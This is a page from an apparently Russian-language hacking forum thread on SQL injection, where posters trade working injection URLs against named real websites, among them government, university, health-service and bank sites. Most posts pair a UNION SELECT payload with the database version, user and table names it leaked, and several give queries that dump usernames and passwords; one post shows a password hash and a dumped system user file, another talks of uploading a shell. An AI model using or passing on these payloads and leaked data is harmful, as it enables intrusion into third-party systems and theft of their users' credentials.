SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Пассы в открытом виде...
     
    2 people like this.
  2. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    stamijugend.ch
    http://www.stamijugend.ch/links/links.php?id=1/**/anD/**/1=8/**/uniON/**/seLecT/**/1,version()/**/FROM/**/users/**/LIMIT/**/0,1
    version - 5.1.30-log
    user - [email protected]
    database - stadtm44_stamijugend
    table - users (username, userpass)

    http://www.stamijugend.ch/links/links.php?id=1/**/anD/**/1=8/**/uniON/**/seLecT/**/1,conCAt(0x3a3a3a,username,0x3a3a3a,userpass)/**/FROM/**/users/**/LIMIT/**/0,1


    zivilschutz-ooe.at
    http://www.zivilschutz-ooe.at/src/links.php?ID=1+anD+1=-1+uniON+seLEcT+1,user(),3,4,5,6,7+from+users/*
    Version = 5.0.27-standard
    User = b138565227@localhost
    Database = zivilschutz-ooe_at_dbfrast
    table - users (User, Password)

    http://www.zivilschutz-ooe.at/src/links.php?ID=1+anD+1=-1+uniON+seLEcT+1,conCAt(0x3a,User,0x3a,Password),3,4,5,6,7+from+users/*


    sileessenota.com
    http://www.sileessenota.com/links.php?id=1/**/aNd/**/substring(version(),1,1)=4&t=s&idi=4&pagina=2
    ветка 4
     
    #10522 [x60]unu, 2 Sep 2009
    Last edited: 2 Sep 2009
    3 people like this.
  3. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.burschenschaft-feistritz-gail.at/links.php?id=1+anD+substring(version(),1,1)=3/*
     
    _________________________
    2 people like this.
  4. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    PostgreSQL

    http://obras.itajai.sc.gov.br/noticiasp_det.php?id_noticia=99999+and+1=cast((SELECT+inet_server_port()||chr(58)||current_user||chr(58)||version())+as+int)

    port:5432
    user: portal
    version:postgreSQL 8.3.1 on i386-portbld-freebsd7.0, compiled by GCC cc (GCC) 4.2.1 20070719 [FreeBSD]
     
    #10524 Swift, 2 Sep 2009
    Last edited: 2 Sep 2009
    3 people like this.
  5. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    sexshopinsensatez.com.br - сексшоп!!!!(только вы маме моей не говорите)
    http://www.sexshopinsensatez.com.br/links.php?id=1+anD+1=8+uniON+seLECT+1,version(),3,4/*
    version - 5.0.45-community
    user - atualloj_5@localhost
    database - atualloj_7
     
    3 people like this.
  6. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    pr5 all
    Code:
    http://www.museudosesportes.com.br/noticia.php?id=-12583+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7
    mesportes@localhost : mesportes : 5.0.51a-24+lenny1-log
    ---------
    Code:
    http://www.sdu.nhs.uk/page.php?area_id=-7+UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
    nhssdu_db : 5.0.58
    ---------
    Code:
    http://www.cics.go.ug/database/private_detail.php?id=-50+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
    [email protected] : meaug05_cics : 4.1.20-max-log
     
  7. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.vash-divan.ru/help.php?id=4/**/UNION/**/SELECT/**/1,2,3,4,5/**/FROM/**/users/**/LIMIT/**/1,1/*

    Database Version: 4.0.26
    Database name: wwwvashdivanru
    User name: [email protected]
     
    4 people like this.
  8. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    ap
    PR5 All
    Code:
    http://www.pnm.org.tt/docs_policies.php?id=-1+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7
    pnmtt@localhost : pnmtt : 5.0.45-log
    ------------
    Code:
    http://www.anis.sm/Da_leggere/voci_eventuali.php?id=-18+UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6
    admin.guidat.com@localhost : guidatcom : 5.1.34-log
    http://www.anis.sm/amministrazione/
     
    #10528 Shadrin, 3 Sep 2009
    Last edited: 3 Sep 2009
    2 people like this.
  9. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    4.1.22-log:inforesipps@localhost:inforesipps:portbld-freebsd6.1
     
    4 people like this.
  10. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.olena.fr/index.php?RubID=-3+union+select+1,2,concat_ws(0x3a3a,UserLogin,UserPassword),4,5,6,7,8,9,10,11+from+user+--+

    http://www.objectif-emploi.3cfr.com/index.php?ThemeID=3&InfoID=4&OE_RubriqueID=-3+union+select+1,2,database(),4,5,6,7,8+--+
    dragon_072
     
    3 people like this.
  11. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.auqa.edu.au/auqf/2009/program/day.php?id=3-3+union+select+1,2,3,4,version(),6,7%20--

    5.1.34
     
  12. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    file-magz.com - PR=2
    http://file-magz.com/file/core/main/links.php?id=1+anD+1=7+uniON+seLEcT+1,version(),user(),database(),5
    Version = 5.0.81-community
    User = filemcom_magz@localhost
    Database = filemcom_file
    Table - user (username, password)


    http://file-magz.com/file/core/main/links.php?id=1+anD+1=7+uniON+seLEcT+null,username,null,password,null+from+user
     
    #10532 [x60]unu, 3 Sep 2009
    Last edited: 3 Sep 2009
    2 people like this.
  13. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    2:Antoxa:$H$7L1rcA7zwhqrSFK6ngszTHhCRv4M5M1:[email protected]

    /usr/|||redhat-linux-gnu|||/tmp/|||/var/lib/mysql/
     
    2 people like this.
  14. diGriz

    diGriz Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    138
    Likes Received:
    82
    Reputations:
    6
    [PR=8]
    Code:
    http://www.fh-oow.de/studium/studiengaenge/index.php?id=-20+union+select+1,2,3,4,5,6,concat_ws(0x3b,database(),version(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+--+&einzel=1&lang=de
    zsb;4.1.22-log;[email protected]

    [PR=2]
    Code:
    http://www.ergenekonteror.com/karikatur.php?id=-21+union+select+1,2,3,concat_ws(0x3b,database(),version(),user()),5--
    siteetox;5.0.45;[email protected]
     
    3 people like this.
  15. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    ;)

    Code:
    http://www.fixwap.net/ru/html/outtop.php?uid=-238+union+select+concat_ws(0x3a,version(),database(),user())--
    Можно оттуда немнога трафика слить)))
    Ковычки не фильтруются, права на запись не смог посматреть.
    Комну удастся залить шелл, напишите в ПМ.
     
    #10535 SeNaP, 3 Sep 2009
    Last edited: 3 Sep 2009
    4 people like this.
  16. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    Code:
    http://www.psggw.cn/recruit_show.php?Sid=126&id=186+union+select+1,2,3,4,concat_ws(0x3,version(),database(),user()),6,7,8,9,10,11,12,13+limit+1,1/*

    5.0.22 psggw [email protected]
     
    1 person likes this.
  17. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Сберегательный Банк Российской Федерации
    Центрально-Чернозёмый Банк

    http://www.ccb.sbrf.ru/vbank/news.asp?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from+news+
     
    10 people like this.
  18. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    http://gothic.zp.ua/news/index.php?id_parent=1+and+substring(@@version,1,1)=5
     
    #10538 Swift, 3 Sep 2009
    Last edited: 4 Sep 2009
    3 people like this.
  19. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    cpatapie:de2e05e1e4ff48c85d1f9248d001d52b

    root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:100:102::/var/spool/exim4:/bin/false statd:x:101:65534::/var/lib/nfs:/bin/false identd:x:102:65534::/var/run/identd:/bin/false djfgnjnldgklg:x:1000:1000:djfgnjnldgklg,,,:/home/djfgnjnldgklg:/bin/bash sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:1001:1001::/home/mysql:/bin/sh ntp:x:104:104::/home/ntp:/bin/false snmp:x:105:65534::/var/lib/snmp:/bin/false
     
    3 people like this.
  20. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    Code:
    http://www.comicbookdb.com/character.php?ID=-1900+union+select+1,2,3,4,version(),6,7,8,9,0,11--
    Database Version: 5.1.34-community
    Database name: dbcomic_comicbookdb
    User name: [email protected]
     
    3 people like this.
Thread Status:
Not open for further replies.